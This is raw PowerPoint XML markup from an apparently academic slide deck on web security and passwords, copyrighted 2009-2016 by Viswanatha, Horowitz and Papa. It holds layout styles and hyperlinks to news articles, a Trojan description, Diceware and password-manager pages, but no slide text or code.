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65"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId66"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="389" r:id="rId3"/>
    <p:sldId id="391" r:id="rId4"/>
    <p:sldId id="402" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="277" r:id="rId7"/>
    <p:sldId id="280" r:id="rId8"/>
    <p:sldId id="411" r:id="rId9"/>
    <p:sldId id="415" r:id="rId10"/>
    <p:sldId id="278" r:id="rId11"/>
    <p:sldId id="279" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="284" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="298" r:id="rId16"/>
    <p:sldId id="297" r:id="rId17"/>
    <p:sldId id="299" r:id="rId18"/>
    <p:sldId id="300" r:id="rId19"/>
    <p:sldId id="301" r:id="rId20"/>
    <p:sldId id="390" r:id="rId21"/>
    <p:sldId id="302" r:id="rId22"/>
    <p:sldId id="413" r:id="rId23"/>
    <p:sldId id="303" r:id="rId24"/>
    <p:sldId id="304" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="318" r:id="rId27"/>
    <p:sldId id="320" r:id="rId28"/>
    <p:sldId id="399" r:id="rId29"/>
    <p:sldId id="410" r:id="rId30"/>
    <p:sldId id="400" r:id="rId31"/>
    <p:sldId id="401" r:id="rId32"/>
    <p:sldId id="329" r:id="rId33"/>
    <p:sldId id="349" r:id="rId34"/>
    <p:sldId id="350" r:id="rId35"/>
    <p:sldId id="351" r:id="rId36"/>
    <p:sldId id="353" r:id="rId37"/>
    <p:sldId id="365" r:id="rId38"/>
    <p:sldId id="364" r:id="rId39"/>
    <p:sldId id="366" r:id="rId40"/>
    <p:sldId id="383" r:id="rId41"/>
    <p:sldId id="384" r:id="rId42"/>
    <p:sldId id="385" r:id="rId43"/>
    <p:sldId id="386" r:id="rId44"/>
    <p:sldId id="337" r:id="rId45"/>
    <p:sldId id="338" r:id="rId46"/>
    <p:sldId id="333" r:id="rId47"/>
    <p:sldId id="334" r:id="rId48"/>
    <p:sldId id="347" r:id="rId49"/>
    <p:sldId id="348" r:id="rId50"/>
    <p:sldId id="395" r:id="rId51"/>
    <p:sldId id="396" r:id="rId52"/>
    <p:sldId id="397" r:id="rId53"/>
    <p:sldId id="404" r:id="rId54"/>
    <p:sldId id="398" r:id="rId55"/>
    <p:sldId id="409" r:id="rId56"/>
    <p:sldId id="412" r:id="rId57"/>
    <p:sldId id="403" r:id="rId58"/>
    <p:sldId id="416" r:id="rId59"/>
    <p:sldId id="417" r:id="rId60"/>
    <p:sldId id="414" r:id="rId61"/>
    <p:sldId id="405" r:id="rId62"/>
    <p:sldId id="406" r:id="rId63"/>
    <p:sldId id="407" r:id="rId64"/>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1"/>
    <p:restoredTop sz="88382" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="80" d="100"/>
          <a:sy n="80" d="100"/>
        </p:scale>
        <p:origin x="126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970338" y="0"/>
            <a:ext cx="3038475" cy="4619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MS PGothic" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CB31F169-33E4-4B5E-8A13-929005594B10}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12/7/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8772525"/>
            <a:ext cx="3038475" cy="461963"/>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MS PGothic" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D9850D75-1265-4DA2-A14E-E9CC38B4EB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0375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92302" tIns="46151" rIns="92302" bIns="46151"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0375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="92302" tIns="46151" rIns="92302" bIns="46151" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="MS PGothic" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{DF19D3FB-B192-4366-8927-47A1356623B6}" type="datetime1">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>12/7/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196975" y="693738"/>
            <a:ext cx="4618038" cy="3463925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92302" tIns="46151" rIns="92302" bIns="46151" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701675" y="4387850"/>
            <a:ext cx="5607050" cy="4154488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92302" tIns="46151" rIns="92302" bIns="4615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4113"/>
            <a:ext cx="3038475" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="92302" tIns="46151" rIns="92302" bIns="46151"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774113"/>
            <a:ext cx="3038475" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="92302" tIns="46151" rIns="92302" bIns="46151" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="MS PGothic" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8A642750-A27C-491A-BA27-B99EBE1DD5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Geneva" charset="0"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="Geneva" pitchFamily="-1" charset="-128"/>
        <a:cs typeface="Geneva" charset="0"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="Geneva" pitchFamily="-1" charset="-128"/>
        <a:cs typeface="Geneva" charset="0"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="Geneva" pitchFamily="-1" charset="-128"/>
        <a:cs typeface="Geneva" charset="0"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="30000"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1200" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="Geneva" pitchFamily="-1" charset="-128"/>
        <a:cs typeface="Genev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cs typeface="Geneva" pitchFamily="3"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F4F1079-E298-4BF0-A021-91CEB2F4EB28}"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Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRP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3591480-F4B8-4152-B383-7E45C50DF9B3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">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5"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6"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Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216025" y="6354763"/>
            <a:ext cx="1219200" cy="366712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9C4758A1-B0DB-444A-A7D8-B205341C7172}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90053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6" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BA0375C6-19D5-403D-B001-6EB2179A7A68}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252718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traight Connector 12"/>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9" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A95F9177-9F08-4767-9EDC-01A335A6D2CC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22745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lgn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{87230578-5545-4AE9-B3B2-737E342B256A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="277846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r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>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5CD2D562-DEA2-4636-8EDF-B8465F1793C0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17445656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lgn="ctr">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5B5370D7-611B-4092-9197-0A31AEAC4707}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256384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9" name="Slide Number Placeholder 22"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7D171C8D-10AA-4FAD-945E-9147131B6408}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101403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6" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5F825061-70F0-407E-A8B3-C21F73F48278}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="295616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6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{65E11859-1385-4637-8596-52DDCD38CE6E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361839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10" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{BD434CA5-5C6C-4069-8662-9B4D662F1E51}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245253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Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D9E4F61E-FDFF-45DC-BC3E-7BF8D7784997}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221972642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cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a: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Gill Sans MT" charset="0"/>
                <a:ea typeface="MS PGothic" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5509B37C-0A63-4414-B796-36C97A4ECA9B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Straight Connector 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6353175"/>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57200" y="11430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501" r:id="rId1"/>
    <p:sldLayoutId id="2147484502" r:id="rId2"/>
    <p:sldLayoutId id="2147484503" r:id="rId3"/>
    <p:sldLayoutId id="2147484504" r:id="rId4"/>
    <p:sldLayoutId id="2147484499" r:id="rId5"/>
    <p:sldLayoutId id="2147484505" r:id="rId6"/>
    <p:sldLayoutId id="2147484506" r:id="rId7"/>
    <p:sldLayoutId id="2147484507" r:id="rId8"/>
    <p:sldLayoutId id="2147484508" r:id="rId9"/>
    <p:sldLayoutId id="2147484500" r:id="rId10"/>
    <p:sldLayoutId id="2147484509" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
          <a:cs typeface="Geneva" charset="0"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2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Geneva" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3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Geneva" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4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Geneva" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3200">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
          <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
          <a:cs typeface="Geneva"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S PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
          <a:cs typeface="Geneva" charset="0"/>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Geneva" pitchFamily="-1" charset="-128"/>
          <a:cs typeface="Geneva" charset="0"/>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Geneva" pitchFamily="-1" charset="-128"/>
          <a:cs typeface="Geneva" charset="0"/>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Geneva" pitchFamily="-1" charset="-128"/>
          <a:cs typeface="Geneva" charset="0"/>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Geneva" pitchFamily="-1" charset="-128"/>
          <a:cs typeface="Geneva"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curitylabs.websense.com/content/Alerts/3061.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Zlob_Troj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wired.com/27bstroke6/2009/01/professed-twit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uctionbytes.com/cab/abn/y07/m10/i09/s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acdevcenter.com/pub/a/mac/2005/01/01/pari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log.wired.com/27bstroke6/2008/09/palin-e-mail-ha.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rustwave.com/global-security-report" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://digitaljournal.com/article/32060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orld.std.com/~reinhold/dicewarewordlist.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Diceware" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firstlook.org/theintercept/2015/03/26/passphrases-can-memorize-attackers-cant-guess/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.keepassx.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123greetings.com/view/AD30725122116211" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123greetings.com/view/AD30725122110120" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123greetings.com/view/AD30725122122507" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://123greetings.com/view/AD30725122120803" TargetMode="External"/><Relationship Id="rId4" 